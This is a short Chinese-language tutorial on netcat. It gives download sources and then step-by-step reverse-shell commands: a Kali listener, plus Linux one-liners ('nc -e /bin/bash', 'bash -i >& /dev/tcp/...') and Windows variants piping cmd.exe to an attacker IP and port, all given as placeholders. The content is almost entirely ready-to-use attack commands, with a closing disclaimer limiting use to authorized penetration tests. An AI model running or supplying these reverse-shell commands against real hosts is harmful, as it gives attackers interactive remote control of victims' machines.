目录
一、nc下载
linux:apt install nc
window:https://eternallybored.org/misc/netcat/
二、nc--反弹shell
1. 在 Kali Linux 上监听连接
打开终端(命令行界面)并运行以下命令来监听连接:
nc -lvp <监听端口>
例如:`nc -lvp 4444`,这将在 Kali Linux 上监听 4444 端口。
2. 在目标主机上发起连接请求
(1)Linux
nc -e /bin/bash <kali的IP> <kali监听端口>
或者
bash -i >& /dev/tcp/<kali的IP>/<kali监听端口> 0>&1
这将在目标 Linux 主机上执行 `/bin/bash`,并将其输出传递到 Kali Linux 上的监听端口。
(2)windows
nc -e cmd.exe <kali的IP> <kali监听端口>
或者
cmd.exe | nc <kali的IP> <kali监听端口>
3. 连接建立
一旦目标主机发起连接请求,Kali Linux 将接受连接,并在终端显示连接信息。
4. 获取反弹的 shell
在 Kali Linux 上,你现在将获得一个交互式的 shell,你可以在其中执行命令,就像在目标系统上直接操作一样。
<--------- 申明 --------->
请注意,反弹 shell 是一种网络攻击技术,可能会带来安全风险,只能在授权和合法的渗透测试环境中使用。使用反弹 shell 进行未授权的攻击是非法的,并可能导致严重的法律后果。在进行任何安全测试之前,请确保获得适当的授权,并且仅在合法的环境中使用。同时,谨慎处理并遵守适用的法律和规定。